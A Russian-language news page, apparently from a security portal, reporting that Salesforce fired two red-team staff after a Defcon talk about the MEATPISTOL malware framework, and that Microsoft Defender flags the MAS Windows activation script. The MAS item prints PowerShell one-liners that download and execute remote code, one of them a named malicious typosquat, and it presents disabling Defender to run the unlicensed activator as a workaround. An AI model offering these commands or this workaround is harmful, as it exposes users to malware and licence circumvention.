Salesforce уволила сотрудников во время конференции Defcon

Salesforce уволила сотрудников во время конференции Defcon

Salesforce уволила сотрудников во время конференции Defcon

Salesforce уволила директора безопасности и другого старшего сотрудника после выступления на конференции Defcon по безопасности в Лас-Вегасе. Джош Шварц (Josh Schwartz) и Джон Крэмб (John Cramb), директор и старший специалист по безопасности соответственно, работали над проектом «red team», в рамках которого они запускали атаки внутри компании, чтобы проверить, насколько хорошо защищена Salesforce.

По словам одного из свидетелей, сотрудники были уволены старшим руководителем Salesforce «как только сошли со сцены».

Камнем преткновения стала речь экспертов, касающаяся MEATPISTOL, модульной структуре вредоносных программ для создания имплантов, автоматизации инфраструктуры и взаимодействия с оболочкой, направленной на сокращение времени, потраченного на реконфигурирование и переписывание вредоносных программ. Предполагалось, что MEATPISTOL будет брать на себя «скучную часть» тестов на проникновение, что сделает тестирование более эффективным.

Руководители Salesforce были впервые ознакомлены с проектом на встрече в феврале. Ожидается, что этот инструмент будет выпущен позже как проект с открытым исходным кодом, позволяющий другим специалистам по безопасности использовать его в своих собственных компаниях.

Однако в текстовом сообщении, отправленном Шварцу и Крэмбу до их выступления, исполнительный директор Salesforce предупредил спикеров о том, что они не должны объявлять публичный выпуск кода.

Позже, на сцене, Шварц сказал присутствующим, что он будет бороться за то, чтобы сделать этот инструмент публичным. Крэмб позже отметил в твиттере, что оба сотрудника заботятся о том, чтобы MEATPISTOL стал открытым источником и в настоящее время работают над достижением этого.

Новости об увольнении просочились после твита Шварца, опубликованного через несколько часов после конференции. В нем специалист отметил, что об увольнении уже было хорошо известно непосредственно во время самого мероприятия.

Позже он удалил твит и закрыл аккаунт по просьбе компании. Официальную причину увольнения так и не удалось выяснить.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru